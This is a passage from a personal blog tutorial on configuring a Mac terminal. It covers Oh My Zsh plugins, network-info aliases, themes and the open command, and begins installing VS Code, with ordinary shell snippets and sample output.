<span style="color: white;">.....</span> <span style="color: white;">=</span> <span style="color: white;">../../../..</span>
<span style="color: white;">......</span> <span style="color: white;">=</span> <span style="color: white;">../../../../..</span>
<span style="color: white;">_</span> <span style="color: white;">=</span> <span style="color: white;">sudo</span>
<span style="color: white;">afind</span> <span style="color: white;">=</span> <span style="color: white;">ack</span> <span style="color: white;">-il</span>
<span style="color: white;">cat</span> <span style="color: white;">=</span> <span style="color: white;">bat</span>
<span style="color: white;">ec</span> <span style="color: white;">=</span> <span style="color: white;">subl</span> <span style="color: white;">/Users/mhubbard/.zshrc</span>
<span style="color: white;">egrep</span> <span style="color: white;">=</span> <span style="color: white;">egrep</span> <span style="color: white;">--color=auto</span> <span style="color: white;">--exclude-dir={.bzr,CVS,.git,.hg,.svn,.idea,.tox}</span>
<span style="color: white;">exa1</span> <span style="color: white;">=</span> <span style="color: white;">exa</span> <span style="color: white;">-lFT</span> <span style="color: white;">--group-directories-first</span>
<span style="color: white;">extip</span> <span style="color: white;">=</span> <span style="color: white;">dig</span> <span style="color: white;">+short</span> <span style="color: white;">myip.opendns.com</span> <span style="color: white;">@resolver1.opendns.com</span>
<span style="color: white;">fgrep</span> <span style="color: white;">=</span> <span style="color: white;">fgrep</span> <span style="color: white;">--color=auto</span> <span style="color: white;">--exclude-dir={.bzr,CVS,.git,.hg,.svn,.idea,.tox}</span>
<span style="color: white;">ggpur</span> <span style="color: white;">=</span> <span style="color: white;">ggu</span>
</pre></div>
<p><br /></p><h4 style="text-align: left;"><b>Git</b></h4><p>This plugin provides a lot of aliases for git. If you aren't using git then there is no need to add it in. This plugin doesn't require a separate download either. Just add "git" to the plugins section.</p><p><br /></p><h4 style="text-align: left;">ZSH Docker Aliases</h4><p>An amazing collection of Docker aliases. The project GitHub has a complete listing of the aliases.</p><p><b>Installation</b></p>
<!--HTML generated using hilite.me--><div style="background: rgb(255, 255, 255); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="font-weight: bold;">git</span> <span style="font-weight: bold;">clone</span> <span style="font-weight: bold;">https</span>://<span style="font-weight: bold;">github.com</span>/<span style="font-weight: bold;">akarzim</span>/<span style="font-weight: bold;">zsh-docker-aliases.git</span> ~/<span style="font-weight: bold;">.oh-my-zsh</span>/<span style="font-weight: bold;">custom</span>/<span style="font-weight: bold;">plugins</span>/<span style="font-weight: bold;">zsh-docker-aliases</span>
<span style="border: 1px solid rgb(255, 0, 0);">#</span> <span style="font-weight: bold;">then</span> <span style="font-weight: bold;">add</span> <span style="border: 1px solid rgb(255, 0, 0);">`</span><span style="font-weight: bold;">zsh-docker-aliases</span><span style="border: 1px solid rgb(255, 0, 0);">`</span> <span style="font-weight: bold;">to</span> <span style="border: 1px solid rgb(255, 0, 0);">`</span><span style="font-weight: bold;">plugins</span><span style="border: 1px solid rgb(255, 0, 0);">`</span> <span style="font-weight: bold;">in</span> <span style="font-weight: bold;">your</span> <span style="font-weight: bold;">.zshrc</span>
</pre></div>
<p><a href="https://github.com/akarzim/zsh-docker-aliases">Project GitHub</a></p><p><br /></p><p>Here is what my plugins section looks like:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #330099; font-weight: bold;">plugins</span><span style="color: #555555;">=(</span><span style="color: #330099; font-weight: bold;">git</span>
<span style="color: #330099; font-weight: bold;">zsh-completions</span>
<span style="color: #330099; font-weight: bold;">zsh-autosuggestions</span>
<span style="color: #330099; font-weight: bold;">zsh-syntax-highlighting</span>
<span style="color: #330099; font-weight: bold;">history-substring-search</span>
<span style="color: #330099; font-weight: bold;">colored-man-pages</span>
<span style="color: #330099; font-weight: bold;">aliases</span>
<span style="color: #330099; font-weight: bold;">zsh-docker-aliases</span>
<span style="color: #555555;">)</span>
</pre></div>
<p><br /></p><p>There are many more plugins for zsh. They can be found here: <a href="https://github.com/ohmyzsh/ohmyzsh/wiki/Plugins">ZSH Plugins webpage</a></p><p><br /></p><p><b>Set the editors to use</b></p><p>Set nano as the editor when using ssh and VSCode when not.</p><p>Find the line below, uncomment the if statement. Change the EDITOR variable to nano and code. NOTE: We will install VScode next so don't run the zsh edit command until we finish installing VSCode.</p><p>Preferred editor for local and remote sessions</p>
<p><!--HTML generated using hilite.me--></p><div style="background-color: #111111; background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #fb660a; font-weight: bold;">if</span> <span style="color: white;">[[</span> <span style="color: white;">-n</span> <span style="color: white;">$SSH_CONNECTION</span> <span style="color: white;">]];</span> <span style="color: white;">then</span>
<span style="color: white;">export</span> <span style="color: white;">EDITOR=</span><span style="color: #0086d2;">'nano'</span>
<span style="color: #fb660a; font-weight: bold;">else</span>
<span style="color: white;">export</span> <span style="color: white;">EDITOR=</span><span style="color: #0086d2;">'code'</span>
<span style="color: white;">fi</span>
</pre></div>
<p><b>Add some aliases to the .zshrc file</b></p><p>Obviously, aliases are very personal. You may not want the ones I have added, but they are good examples of how to create aliases if you want to create your own. Once you get used to aliases you will wonder how you got by without them.</p><p><b>Update</b> - I found a blog on aliases and it suggested put a 2 charcter prefix on your aliases. That way you can type the 2 characters, hit tab twice, and all of your personal aliases will be listed. <br /><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBLp0fSU6VwQyhwBLNGNFyHbLCvmo87WIzrT4q24hMNYqC_Y7olD9abBZBsce2H3uMYUWRzqiCGCq1WsU9gzWdrgksai3wjx6REe6nWwEurSyK7gw7Zm1unyy1T6bSht2nPsHhKCxTAbzkJKFGZuxT7UCbXq6l3-CiEmwPllNxnKT3rtUHNfqbFThsg/s1632/ZSH-Aliases.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="1632" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBLp0fSU6VwQyhwBLNGNFyHbLCvmo87WIzrT4q24hMNYqC_Y7olD9abBZBsce2H3uMYUWRzqiCGCq1WsU9gzWdrgksai3wjx6REe6nWwEurSyK7gw7Zm1unyy1T6bSht2nPsHhKCxTAbzkJKFGZuxT7UCbXq6l3-CiEmwPllNxnKT3rtUHNfqbFThsg/w585-h64/ZSH-Aliases.png" width="585" /></a></div><br />At the time of this writing, macOS includes Python 2.7. Since most of my tools are Python 3 I created these two aliases:<br />
<p><!--HTML generated using hilite.me--></p><div style="background-color: #111111; background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">python=python3</span>
<span style="color: white;">alias</span> <span style="color: white;">pip=pip3</span>
</pre></div>
<p><b>Show IP Address, Default GW, and name servers for wifi</b></p>
<!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">ipen0=</span><span style="color: #0086d2;">'ifconfig en0 | grep "ether\|broadcast";netstat -nr | grep default | grep en0;cat /etc/resolv.conf | grep -v \#'</span>
</pre></div><p></p>
└─[$] ipen0 [19:55:49]
ether 50:ed:3c:22:be:32
inet 192.168.10.143 netmask 0xffffff00 broadcast 192.168.10.255
default 192.168.10.254 UGScg en0
nameserver 1.1.1.1
nameserver 208.67.222.222
inet6 fe80::1c73:952b:1fdf:6cda%en0 prefixlen 64 secured scopeid 0xc
<p>NOTE - On the M1 I had to add the \ character in front of the # symbol. Do not include it if you are on an Intel Mac.</p><div style="text-align: left;">┌─[mhubbard@HP8600-4] - [~/.ssh] - [3155]<br />└─[$] ipen0 <br /><span style="white-space: pre;"> </span>ether 50:ed:3c:22:be:32<br /><span style="white-space: pre;"> </span>inet 192.168.10.143 netmask 0xffffff00 broadcast 192.168.10.255<br />default 192.168.10.254 UGScg en0<br />nameserver 1.1.1.1<br />nameserver 208.67.222.222</div><p><br /></p><p><b>Show IP Address, Default GW, and name servers for en6</b></p>
<!--HTML generated using hilite.me--><div style="background-color: #111111; background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">ipen6=</span><span style="color: #0086d2;">'ifconfig en6 | grep "ether\|broadcast";netstat -nr | grep default | grep en0;cat /etc/resolv.conf | grep -v \#'</span>
</pre></div>
<p>NOTE - On the M1 I had to add the \ character in front of the # symbol. Do not include it if you are on an Intel Mac.</p><p>If you use a lot of different USB adapters you can use an alias with command line parameters. That way you just enter ipen<interface #> instead of having to create an alias for each interface.</p>
<p><!--HTML generated using hilite.me--></p><div style="background-color: #111111; background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">ipenx=</span><span style="color: #0086d2;">'(){ifconfig en$1 | grep "ether\|broadcast";netstat -nr | grep default | grep en$1;cat /etc/resolv.conf | grep -v \# ;}'</span>
</pre></div>
<p>NOTE - On the M1 I had to add the \ character in front of the # symbol. Do not include it if you are on an Intel Mac.</p><h4 style="text-align: left;">Example</h4><div>I plugged in a USB 3.0 Ethernet adapter. It came up as en10.</div><div><br /></div><div style="text-align: left;"><b>ifconfig en10</b></div><div style="text-align: left;">en10: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500<br /><span style="white-space: pre;"> </span>options=6467<RXCSUM,TXCSUM,VLAN_MTU,TSO4,TSO6,CHANNEL_IO,PARTIAL_CSUM,ZEROINVERT_CSUM><br /><span style="white-space: pre;"> </span>ether 00:e0:4c:68:00:c2<br /><span style="white-space: pre;"> </span>inet6 fe80::18c6:afde:6f:b92f%en10 prefixlen 64 secured scopeid 0x17<br /><span style="white-space: pre;"> </span>inet 192.168.10.149 netmask 0xffffff00 broadcast 192.168.10.255<br /><span style="white-space: pre;"> </span>nd6 options=201<PERFORMNUD,DAD><br /><span style="white-space: pre;"> </span>media: autoselect (1000baseT <full-duplex>)<br /><span style="white-space: pre;"> </span>status: active</div><p><b>ipenx 10</b></p><div style="text-align: left;"><span style="white-space: pre;"> </span>ether 00:e0:4c:68:00:c2<br /><span style="white-space: pre;"> </span>inet 192.168.10.149 netmask 0xffffff00 broadcast 192.168.10.255<br />default 192.168.10.254 UGSc en10<br />nameserver 1.1.1.1<br />nameserver 208.67.222.222</div><p>I found this on stackexchange.com - <a href="https://stackoverflow.com/questions/34340575/zsh-alias-with-parameter">zsh alias with parameter</a></p>
<h4 style="text-align: left;">IPv6</h4><p>I have started to work with IPv6 a lot lately. I added some code to the IP alias to show the IPv6 address along with the IPv4 address information. </p>
<!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">ipen0=</span><span style="color: #0086d2;">'ifconfig en0 | grep "ether\|broadcast";netstat -nr | grep default | grep en0;cat /etc/resolv.conf | grep -v \#;ifconfig en0 | grep inet6'</span><span style="font-family: Times;"><span style="white-space: normal;">
</span></span></pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;">┌─[mhubbard@HP8600-4] - [~/.ssh] - [3154]<br />└─[$] ipen0 <br /><span style="white-space: pre;"> </span>ether 50:ed:3c:22:be:32<br /><span style="white-space: pre;"> </span>inet 192.168.10.143 netmask 0xffffff00 broadcast 192.168.10.255<br />default 192.168.10.254 UGScg en0<br />nameserver 1.1.1.1<br />nameserver 208.67.222.222<br /><span style="white-space: pre;"> </span>inet6 fe80::1c73:952b:1fdf:6cda%en0 prefixlen 64 secured scopeid 0xc</div><p><br /></p><div style="text-align: left;">If you just want the IPv6 Address you can use this alias</div><div style="text-align: left;"><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">ipen0=</span><span style="color: #0086d2;">'ifconfig en0 | grep "ether\|broadcast";netstat -nr | grep default | grep en0;cat /etc/resolv.conf | grep -v \#;ifconfig en0 | grep inet6 | awk -F " " '</span>\<span style="color: #0086d2;">''</span><span style="color: white;">{print</span> <span style="color: white;">$</span><span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">}</span><span style="color: #0086d2;">'\''</span> <span style="color: white;">|</span> <span style="color: white;">sed</span> <span style="color: #0086d2;">'s/%en0//''</span>
</pre></div>
<p>┌─[mhubbard@HP8600-4] - [~/.ssh] - [3155]<br />└─[$] ipen0 <br /><span style="white-space: pre;"> </span>ether 50:ed:3c:22:be:32<br /><span style="white-space: pre;"> </span>inet 192.168.10.143 netmask 0xffffff00 broadcast 192.168.10.255<br />default 192.168.10.254 UGScg en0<br />nameserver 1.1.1.1<br />nameserver 208.67.222.222<br />fe80::1c73:952b:1fdf:6cda</p><p><br /></p><p># Return the public IP address you are using<!--HTML generated using hilite.me--></p><div style="background-color: #111111; background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">extip=</span><span style="color: #0086d2;">"dig +short myip.opendns.com @resolver1.opendns.com"</span>
</pre></div>
<p># open ~/.zshrc in using the default editor specified in $EDITOR</p>
<p><!--HTML generated using hilite.me--></p><div style="background-color: #111111; background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">ec=</span><span style="color: #0086d2;">"$EDITOR $HOME/.zshrc"</span>
</pre></div>
<p># reload ~/.zshrc after making changes to active the changes</p>
<!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alias</span> <span style="color: white;">sc=</span><span style="color: #0086d2;">"exec zsh"</span>
</pre></div>
<div><br /></div><div>Exit Nano (CTRL+X), Y to save, enter to exit.</div><div><br /></div><div>Now refresh the .zshrc file</div><div>exec ~/.zshrc</div><div><br /></div><div>You can now enter sc to refresh the .zshrc file!</div><div><br /></div><h4 style="text-align: left;">Search History</h4><div><div>Allow searching with the up arrow</div><div>Add "history-substring-search" to the plugins line:</div><div><br /></div><div>plugins=(git zsh-completions zsh-autosuggestions zsh-syntax-highlighting history-substring-search)</div><div><br /></div><div>After adding the search history to the plugin line, add this after the aliases</div><div>bindkey "^[[A" history-search-backward</div><div>bindkey "^[[B" history-search-forward</div><div><br /></div><div>You can use the bindkey command to list all of your keyboard shortcuts in zsh.</div><div><br /></div><div>Save and run the sc alias to reload oh my zsh</div></div><div><br /></div><div><br /></div><div>Oh My ZSH is now ready to run!</div><div><br /></div><div>Type </div><div>ip [enter]</div><div>and you should see a nicely formatted output of the wifi ip address, gw, and DNS servers.</div><div><br /></div><div><div>ip</div><div><span class="Apple-tab-span" style="white-space: pre;"> </span><span style="color: red;">ether</span> 50:ed:3c:22:be:32</div><div><span class="Apple-tab-span" style="white-space: pre;"> </span>inet 192.168.10.139 netmask 0xffffff00 <span style="color: red;">broadcast</span> 192.168.10.255</div><div>default 192.168.10.254 UGSc <span style="color: red;">en0</span></div><div>nameserver 1.1.1.1</div><div>nameserver 208.67.222.222</div></div><div><br /></div><div>Type</div><div>extip [enter]</div><div><br /></div><div>and you should see the public IP you are using.</div><div><br /></div><div><div>To search command history, enter a couple letters and then press the UP arrow. It's a small thing but it will make a big difference in your daily use of the terminal.</div><div><br /></div></div><h4 style="text-align: left;">Themes</h4><div>Oh My ZSH has a lot of prebuilt themes that you can use. I like to have my cursor below the name and path since some of my paths get pretty long. I am currently using a theme named "duellj". Here is what it looks like:<br /><br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNTQWKUr-KpxX2Sv2E1YrqX0Ksre0HXq8pyg0a0qKI5xmpPXJlhYk4BpGyKi0K08UMPaLLhi6oRpv6fqFiXJ94T_rsLQOD-CeeJMFbOCiUP6zghx2KwF8Ay3I8DeqrUrydMVhvBrG_cUa3/s842/Screen+Shot+2021-05-02+at+22.34.21.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="72" data-original-width="842" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNTQWKUr-KpxX2Sv2E1YrqX0Ksre0HXq8pyg0a0qKI5xmpPXJlhYk4BpGyKi0K08UMPaLLhi6oRpv6fqFiXJ94T_rsLQOD-CeeJMFbOCiUP6zghx2KwF8Ay3I8DeqrUrydMVhvBrG_cUa3/w589-h50/Screen+Shot+2021-05-02+at+22.34.21.png" width="589" /></a></div><br /><div>The number after the path is the current history number. That is useful if you want to repeat a previous command using !<history number>. </div><div><br /></div><div>To change your theme just open the .zshrc file (ec if you added the alias) and find the entry for ZSH_THEME and set it to duellj:</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background-color: #f0f3f3; background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">ZSH_THEME<span style="color: #555555;">=</span><span style="color: #cc3300;">"duellj"</span>
</pre></div>
<div><br /></div><div>The repository of themes is listed in the reference section below. </div><h4 style="text-align: left;">Fixing Path issues in ZSH</h4><div>After adding a lot of programs and customizing my .zshrc file I noticed that my path statement had several duplicate values. I found this article <a href="https://towardsdatascience.com/my-path-variable-is-a-mess-e52f22bfa520">My PATH Variable is a Mess</a> on the towardsdatascience.com site. It's worth reading even if your path isn't a mess and covers both macOS and Ubuntu!</div><div><br /></div><div>TLDR - add "typeset -U PATH" as the last line in your .zshrc file</div><h4 style="text-align: left;">References for Oh My ZSH</h4><div><a href="https://github.com/ohmyzsh/ohmyzsh">ohmyzsh / ohmyzsh</a><br /></div><div><a href="https://unix.stackexchange.com/questions/97843/how-can-i-search-history-with-text-already-entered-at-the-prompt-in-zsh">How can I search history with text already entered at the prompt in zsh?</a><br /></div><div><a href="https://github.com/AidanGlickman/Dotfiles-Mac/blob/master/terminal/.zshrc">AidanGlickman / Dotfiles-Mac</a><br /></div><div><a href="http://www.geekmind.net/2011/01/shortcuts-to-improve-your-bash-zsh.html">Shortcuts to improve your bash-zsh</a><br /></div><div><a href="https://github.com/ohmyzsh/ohmyzsh/wiki/Themes">Oh My ZSH Theme</a><br /></div><div><a href="https://www.sitepoint.com/zsh-tips-tricks/">10 Zsh Tips & Tricks: Configuration, Customization & Usage</a><br /></div><div><a href="https://stackoverflow.com/questions/24245661/unix-alias-fails-with-awk-command">unix alias fails with awk command</a><br /></div><div><a href="https://codeburst.io/7-super-useful-aliases-to-make-your-development-life-easier-fef1ee7f9b73">7 Super Useful Aliases to make your development life easier</a><br /></div><div><a href="https://scriptingosx.com/2019/06/moving-to-zsh/">Moving to zsh</a><br /></div><div><a href="https://github.com/unixorn/awesome-zsh-plugins">Awesome ZSH Plugins</a><br /></div><h3 style="text-align: left;"><br /></h3><h3 id="opencommand" style="text-align: left;">The open command in terminal</h3><div>A co-worker pointed this utility out to me and is useful when you are working in zsh. </div><div><br /></div><h4 style="text-align: left;">Open finder in the current directory</h4><div>You can use the following to open finder in the folder that you are in:</div><div><br /></div><div>open . </div><div><br /></div><div>That's the word "open" with a dot.</div><div><br /></div><h4 style="text-align: left;">Open an application</h4><div><b>open -a Wireshark</b></div><div> </div><div>Will open Wireshark or switch to Wireshark if it is already running. You could do that easy enough using spotlight search so why is this useful? What if you wanted to open a second instance of Wireshark? If you use spotlight it will just switch to the open instance of Wireshark. </div><div><br /></div><div>With open you can use:</div><div><br /></div><div><b>open -n -a Wireshark </b></div><div><br /></div><div>The -n opens a <b>new</b> instance. </div><div><br /></div><div>I created the following lines in my .zshrc file for opening a new Wireshark instance:</div><div><br />
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">#<span style="color: #330099; font-weight: bold;">allow</span> <span style="color: #330099; font-weight: bold;">opening</span> <span style="color: #330099; font-weight: bold;">multiple</span> <span style="color: #330099; font-weight: bold;">Wireshark</span> <span style="color: #330099; font-weight: bold;">windows</span>
<span style="color: #330099; font-weight: bold;">wireshark</span><span style="color: #555555;">=</span><span style="color: #cc3300;">'open -n /Applications/Wireshark.app'</span>
</pre></div>
</div><div><br /></div><div><br /></div><h4 style="text-align: left;">Open an application with a file</h4><p style="text-align: left;">open edge_template.txt</p><p style="text-align: left;"><br />will open edge_template.txt in whatever application you have associated with a .txt file.<br /><br /></p><p style="text-align: left;">Again, not earth-shattering, also, you can open every associated file in a folder:<br /><br /></p><p style="text-align: left;"><b>open *.txt <br /></b><br /></p><p style="text-align: left;">If you have projects organized in a way where you only have a handful of files of type in a folder this is useful.<br /><br /></p><p style="text-align: left;"></p><h4 style="text-align: left;">Open a file in finder</h4>I don't use this often but you can have "open" reveal a file in finder<br /><b>open -R ~/networkRefresh/templates/edge_template.txt</b><br /><p></p><div style="text-align: left;">Here is the result, finder is brought to the front with edge_tepm</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEimpEI4Guefpg40txfcDwDmZQPDnbusUNhNdG6Z_xnehzv4OHfVrTW7mKsvybAeG0tQbNSdb8vyldNjR5hpcYkQodDO1vSRsjtLIKJuSLVTirfefaSk8jSu-bjEi7gvw8-Im-10QYN2VUCWc-TKZhB_zQt-d3N4LfjTaSzgVSKoWC1w00DfBNNLFC5d8g=s1460" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="192" data-original-width="1460" height="85" src="https://blogger.googleusercontent.com/img/a/AVvXsEimpEI4Guefpg40txfcDwDmZQPDnbusUNhNdG6Z_xnehzv4OHfVrTW7mKsvybAeG0tQbNSdb8vyldNjR5hpcYkQodDO1vSRsjtLIKJuSLVTirfefaSk8jSu-bjEi7gvw8-Im-10QYN2VUCWc-TKZhB_zQt-d3N4LfjTaSzgVSKoWC1w00DfBNNLFC5d8g=w640-h85" width="640" /></a></div><br /><div style="text-align: left;"><br /></div><h3 id="VSCode" style="text-align: left;">VS Code </h3><h3 style="text-align: left;">Installation</h3><p>Browse to <a href="https://code.visualstudio.com/">code.visualstudio.com</a></p><p>Download the universal app and run the installer.</p><p><b>Customize</b></p><p>Open VS Code to display the main interface</p><p><b>Add VSCode to the MacOS path</b></p><p> This is required to use code as the zsh editor and be opened from the terminal by typing code</p><p>Open the Command Palette (F1) and type "shell command" to find the "Shell Command: Install 'code' command in PATH" command:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKiy21z7cJX4YJ9tAOmriYquTn_VWzG8_EjVkJIvV2tvHPgcSr8um8M-tVfkQQum4290fSyQgQ9sbtsdPzvfmUakoG3IKmv33psS0ImlISHIonc1Q046-89kwF2qrwTHzgVBtcBvfOvw8z/s1264/VSCode.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="1264" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKiy21z7cJX4YJ9tAOmriYquTn_VWzG8_EjVkJIvV2tvHPgcSr8um8M-tVfkQQum4290fSyQgQ9sbtsdPzvfmUakoG3IKmv33psS0ImlISHIonc1Q046-89kwF2qrwTHzgVBtcBvfOvw8z/w630-h96/VSCode.png" width="630" /></a></div><br /><p><br /></p><p>This works as expected, but I have found that when I close code it removes the path. There must be a way to make it permanent but I haven't found it.</p><p><b>Add the Python extension</b></p><p>On the left, click the extensions view icon</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi3sMn-yXgECCnE8SX0sc0j8j_Hhq_hK6HA_d4t_UUyJ17UC9Udz5szP6jlellam3M5uYxQ_SUltTnJle5wo8pFN6JPeJEf1T4hjEt7ZQMlXBgNJ8b3xL6uEZGpaXfwOHLM5qlbYvOOEiyXiThsRAu6G0GpCjcu-LiYrhaw6wq5KO1Byvn5MsR3-TjlKw=s68" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img alt="Extension Icon" border="0" data-original-height="66" data-original-width="68" height="28" src="https://blogger.googleusercontent.com/img/a/AVvXsEi3sMn-yXgECCnE8SX0sc0j8j_Hhq_hK6HA_d4t_UUyJ17UC9Udz5szP6jlellam3M5uYxQ_SUltTnJle5wo8pFN6JPeJEf1T4hjEt7ZQMlXBgNJ8b3xL6uEZGpaXfwOHLM5qlbYvOOEiyXiThsRAu6G0GpCjcu-LiYrhaw6wq5KO1Byvn5MsR3-TjlKw=w29-h28" width="29" /></a></div><br />search for "python" and install:<p></p><div style="text-align: left;"><br /></div><div style="text-align: left;">"Python <br />IntelliSense (Pylance)<br />Microsoft."</div><p>The latest version as of this writing is the December 2021 release. It includes "Pylance" which MS says provides robust and performant language features to Python users in Visual Studio Code. There is a link to the release page for Pylance in the reference section below.<br /><br /><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh5F3U8qlplHeLLbEtQ9D4k7P27x6dIeiMBt2PQUr_cjfD9Rgz5e_gV7Jvu8KlZ6IuRUFLqKM_PeYgOhCSHAC7P3_01kuL-XmffsVsLIQeI6Zk19uqXMkas9VaDtCM70EoOj9ZO0BcRDe7LPS9kscbnr-xGexs5Ab3qd0Ic5qsyJOS1_bUcCWbKoPvprA=s346" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="346" height="228" src="https://blogger.googleusercontent.com/img/a/AVvXsEh5F3U8qlplHeLLbEtQ9D4k7P27x6dIeiMBt2PQUr_cjfD9Rgz5e_gV7Jvu8KlZ6IuRUFLqKM_PeYgOhCSHAC7P3_01kuL-XmffsVsLIQeI6Zk19uqXMkas9VaDtCM70EoOj9ZO0BcRDe7LPS9kscbnr-xGexs5Ab3qd0Ic5qsyJOS1_bUcCWbKoPvprA=s320" width="320" /></a></div><br /><p>There are hundreds of more extensions for Code. You can go to <a href="https://marketplace.visualstudio.com/VSCode">VSCode Marketplace</a> to find more. </p><p>This blog has some advice on what to add - <a href="https://dev.to/benjaminmock/vs-code-extensions-to-become-a-more-productive-developer-5a62?utm_source=digest_mailer&utm_medium=email&utm_campaign=digest_email">vscode extensions to become a more productive developer</a></p><div style="text-align: left;"><h4 style="text-align: left;">Themes</h4><div>There a lot of custom themes available in the marketplace. Regardless of your tastes you will be able to find one that like. I put a link to a review of 10 of the most downloaded themes in the reference section below. I am currently using the github theme. It comes with several light and dark themes. I am using dark with high contrast. You can install it by clicking <a href="https://marketplace.visualstudio.com/items?itemName=GitHub.github-vscode-theme">here</a>.</div><div><br /></div><div style="text-align: left;">This is what the Github Dark High Contrast theme looks like:</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj9XrWWxioaZVoEFAkbkXr3RJiTPtVZXmQS-vAbLiwiQeUouR0Y-TLZNXFSfx53oKfIdO1Qpk_P7x6SWIa2ydLbvZBhjOAAdvQjCxh_-ydBvt5ShReoQ47PQWL6ahbTIo1MGUDNa-sN4nn2HDf024hsglclfdeb4FG1RHu3j9bqCrVx4NYBX-cNu4dHHg=s832" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="832" height="207" src="https://blogger.googleusercontent.com/img/a/AVvXsEj9XrWWxioaZVoEFAkbkXr3RJiTPtVZXmQS-vAbLiwiQeUouR0Y-TLZNXFSfx53oKfIdO1Qpk_P7x6SWIa2ydLbvZBhjOAAdvQjCxh_-ydBvt5ShReoQ47PQWL6ahbTIo1MGUDNa-sN4nn2HDf024hsglclfdeb4FG1RHu3j9bqCrVx4NYBX-cNu4dHHg=s320" width="320" /></a></div><br /><div style="text-align: left;">A great feature of VS Code for python is that it keeps track of your variable 